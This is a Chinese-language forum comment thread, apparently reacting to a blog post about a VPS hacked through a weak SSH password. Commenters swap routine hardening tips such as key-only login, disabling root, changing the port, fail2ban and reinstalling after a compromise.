ssh不用公钥和私钥配对,就是坑自己的活呀~
& & 00:18:39 +08:00 via Android
@ 这……国外独立主机怎么办?
& & 00:20:20 +08:00 via Android
@ 拿到root之后selinux也没用啊
& & 00:24:29 +08:00 via Android
改端口就可以防止这样的破解了 我以前也是这样 虽然扫描的人一直没有成功 但我改完端口就没有人扫了
& & 00:28:57 +08:00
如果密码被破,后面就完全没用了。表示有fail2ban。还有其他防护
& & 00:33:36 +08:00
禁Root登陆,禁密码登录,只允许密钥登陆,替换ssh端口,再安装fail2ban。
我觉得我做到这一步已经可以避免大多数破解了……
& & 01:03:14 +08:00
所以说禁ROOT从SSH登陆是很重要的!!!
以及换SSH端口。
& & 01:06:12 +08:00
@ 除非有人要盯着弄你,那再改也无济于事。一般的话把端口从22改掉,可以免掉几乎全部扫端口BOT了。
& & 03:08:40 +08:00
我还以为会有什么精彩的反击呢,很期待地那么长读下来,结果。。。。
& & 04:13:54 +08:00
@ 为什么要被拿 root,开selinux后,人家 root 就那么好拿么...
& & 04:30:02 +08:00
@ 我的意思是:像楼主这样的弱密码,什么都挡不住……
& & 05:25:05 +08:00
在不用 SSH 的时候把 22 端口关掉就好了,我的主机平时只开放 443 和 80 端口。
& & 05:34:16 +08:00
太长了,没看完。但看评论说是最基本的禁止密码登录、禁止 root 登录、改端口都没做。
& & 05:38:58 +08:00
服务器被黑了还是备份文件 rebuild 吧, 万一恶意程序没清理干净就蛋疼了
& & 05:49:05 +08:00
非标准端口+纯密钥。
来破啊。。。
& & 07:22:47 +08:00 via Android
被黑了哪来的自信可以修复继续用的。。。
& & 08:00:38 +08:00 via iPhone
@ 其实禁止root登录应该就够了。。
@ Hardware KVM
& & 08:17:24 +08:00
看楼主的倒数第二张图,真心痛啊,哈哈哈哈哈
& & 08:23:54 +08:00 via Android
被破了一般直接重装
& & 08:30:57 +08:00
@ 全文转载
& & 08:39:33 +08:00 via Android
你确定没有其他没发现的马?
& & 09:26:42 +08:00
@ 其实也不能说转载,因为文章内容就是LZ自己的。
我觉得@ 禁止全文转载的初衷是保护原文作者的流量和权益
& & 09:28:05 +08:00 via Android
@ 文章是我自己写的,不算全文转载呀
& & 09:35:47 +08:00
& & 09:37:53 +08:00
最开始就是no zuo no die why you try
搞了半天写的都是亡羊补牢
& & 09:41:54 +08:00
跟看小说一样~轻松有趣
& & 09:50:39 +08:00 via iPhone
被黑直接重装,说过很多遍了。
& & 09:56:44 +08:00
@ 哈哈哈哈,你是想说幸好楼主被 肉鸡 一下,要不每个月的份子钱都白出了。(突然发觉自己也是白出份子钱的一个 :-( )
@ 楼主这逗逼,能不能不配这么 low 的表情图啊。要配也至少小一点吧。
& & 10:04:44 +08:00
绝大多数都是无用功
+1
& & 10:13:28 +08:00
@ 这是楼主自己博客的文章。
& & 10:13:31 +08:00
实验室的服务器全是用 root 登录的,欢迎大家来暴力破解。。
& & 10:30:09 +08:00
楼上一堆人说 无用功。
无用功个屁啊,楼主就是在讲一个故事。
& & 10:34:04 +08:00
@ 哈哈哈哈哈哈,就是这个意思啦,不过可以挂个SS上去
& & 10:51:15 +08:00
一直在用fail2ban
但是还是吓尿了 赶紧换了个超长密码
& & 10:53:51 +08:00
从日志看, 现在扫描已经拓展到其他端口和其他用户名了
Failed password for invalid user zhangyan from 140.117.183.100 port 4139 ssh2
& & 11:01:44 +08:00 via iPad
用VPS的安全就是很费脑筋。一个普通博客网站的话还不如用虚拟主机。
& & 12:08:39 +08:00
上午老师通知我们所的服务器有被黑的。。
赶紧采取措施。。。orz
& & 12:17:46 +08:00
我是来看配图的。
& & 12:29:22 +08:00
@ 然后你就要考虑kvm over ip的安全性了
& & 12:43:13 +08:00
@ 这个一般是在服务器提供商那儿操作,除非你账号别黑咯。。
& & 16:57:58 +08:00
這自言自語地講了這麼多,我也是。。。
& & 17:22:29 +08:00
表情用的很到位
& & 19:05:36 +08:00
虽然没这方面知识不过看着还是挺欢乐的~
& & 21:56:59 +08:00 via Android
有过和楼主类似的遭遇,还好只是我的ss服务器,直接重做了系统就OK
话说弱密码和root远程登录楼主也够2的。
在此贴一个ibm的ssh安全配置给大家参考
& & 23:08:42 +08:00
哈哈,network int都被关了还能下clamav到droplet里
& & 23:27:49 +08:00
& & 23:31:25 +08:00
我在文章将近末尾的时候提了一句:
& (以上的安全策略的实施也是在服务开启之后一直在进行的)
杀掉进程、去掉rc.local,修改密码,禁止root登陆之后我就申请重新开启服务了:)
& & 23:47:43 +08:00 via iPhone
看到你最后的表情,我以为你反攻了 黑客。
& · & 759 人在线 & 最高记录 3541 & · &
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.0 · 72ms · UTC 18:38 · PVG 02:38 · LAX 11:38 · JFK 14:38? Do have faith in what you're doing.
